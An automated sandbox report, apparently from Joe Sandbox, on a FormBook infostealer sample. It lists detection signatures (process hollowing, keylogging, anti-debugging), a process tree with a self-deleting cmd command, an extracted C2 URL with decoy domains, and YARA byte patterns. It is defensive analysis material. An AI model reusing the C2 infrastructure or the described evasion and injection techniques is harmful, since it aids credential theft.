Edit tour

Windows Analysis Report
shedfam.exe

Overview

General Information

Sample Name:	shedfam.exe
Analysis ID:	756041
MD5:	c0a85d86855b257b25572aa7d9d90381
SHA1:	ea5ce824d225c0df297586a2c6621aea5ab8584b
SHA256:	c9cf9f0fa6980019aa3a93b9b25ca2cf14cfad4b4afef12d43a20ece34d2093b
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Uses netstat to query active network connections and open ports

Maps a DLL or memory area into another process

Performs DNS queries to domains with low reputation

Tries to detect virtualization through RDTSC time measurements

Sample uses process hollowing technique

Modifies the prolog of user mode functions (user mode inline hooks)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Queues an APC in another process (thread injection)

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains functionality to simulate keystroke presses

OS version to string mapping found (often used in BOTs)

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Contains functionality to retrieve information about pressed keystrokes

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Contains functionality to execute programs as a different user

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to launch a program with higher privileges

Potential key logger detected (key state polling based)

Found evasive API chain (may stop execution after accessing registry keys)

Contains functionality to simulate mouse events

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

System is w10x64

shedfam.exe (PID: 2620 cmdline: C:\Users\user\Desktop\shedfam.exe MD5: C0A85D86855B257B25572AA7D9D90381)

kmhbvf.exe (PID: 4820 cmdline: C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)

kmhbvf.exe (PID: 5280 cmdline: C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

NETSTAT.EXE (PID: 2304 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)

cmd.exe (PID: 5488 cmdline: /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.justbeand.com/sk19/"], "decoy": ["21diasdegratitud.com", "kx1993.com", "chasergt.com", "837news.com", "naturagent.co.uk", "gatorinsurtech.com", "iyaboolashilesblog.africa", "jamtanganmurah.online", "gguminsa.com", "lilliesdrop.com", "lenvera.com", "link48.co.uk", "azinos777.fun", "lgcdct.cfd", "bg-gobtc.com", "livecarrer.uk", "cbq4u.com", "imalreadygone.com", "wabeng.africa", "jxmheiyouyuetot.tokyo", "atrikvde.xyz", "ceopxb.com", "autovincert.com", "18traversplace.com", "internetmedianews.com", "entersight.net", "guzmanshandymanservicesllc.com", "gqqwdz.com", "emeraldpathjewelery.com", "flowmoneycode.online", "gaziantepmedicalpointanket.com", "111lll.xyz", "irkwood138.site", "abovegross.com", "shopabeee.co.uk", "greenvalleyfoodusa.com", "dd-canada.com", "libertysminings.com", "baronsaccommodation.co.uk", "kareto.buzz", "freeexercisecoalition.com", "73129.vip", "avanteventexperiences.com", "comercialdiabens.fun", "nondescript.uk", "facal.dev", "detox-71934.com", "kovar.club", "jetsparking.com", "infocuspublicidad.com", "xxhcom.com", "indianvoltage.com", "becrownedllc.com", "3744palosverdes.com", "gospelnative.africa", "linkmastermind.com", "cotgfp.com", "lousweigman.com", "cantoaffine.online", "debbiepatrickdesigns.com", "766626.com", "webcubemedia.africa", "autonomaat.com", "hannahmarsh.co.uk"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9bc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x28b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5849:$sqlite3step: 68 34 1C 7B E1 0x595c:$sqlite3step: 68 34 1C 7B E1 0x5878:$sqlite3text: 68 38 2A 90 C5 0x599d:$sqlite3text: 68 38 2A 90 C5 0x588b:$sqlite3blob: 68 53 D8 7F 8C 0x59b3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: kmhbvf.exe PID: 4820	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1c8cce:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: kmhbvf.exe PID: 5280	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xd3339:$a1: 3C 30 50 4F 53 54 74 09 40 0x160830:$a1: 3C 30 50 4F 53 54 74 09 40 0x161ec0:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: NETSTAT.EXE PID: 2304	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xa6eed:$a1: 3C 30 50 4F 53 54 74 09 40 0xea900:$a1: 3C 30 50 4F 53 54 74 09 40 0x1260c1:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.0.kmhbvf.exe.400000.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.0.kmhbvf.exe.400000.5.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.0.kmhbvf.exe.400000.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.0.kmhbvf.exe.400000.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
2.0.kmhbvf.exe.400000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.0.kmhbvf.exe.400000.5.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.0.kmhbvf.exe.400000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.0.kmhbvf.exe.400000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
1.2.kmhbvf.exe.3b00000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
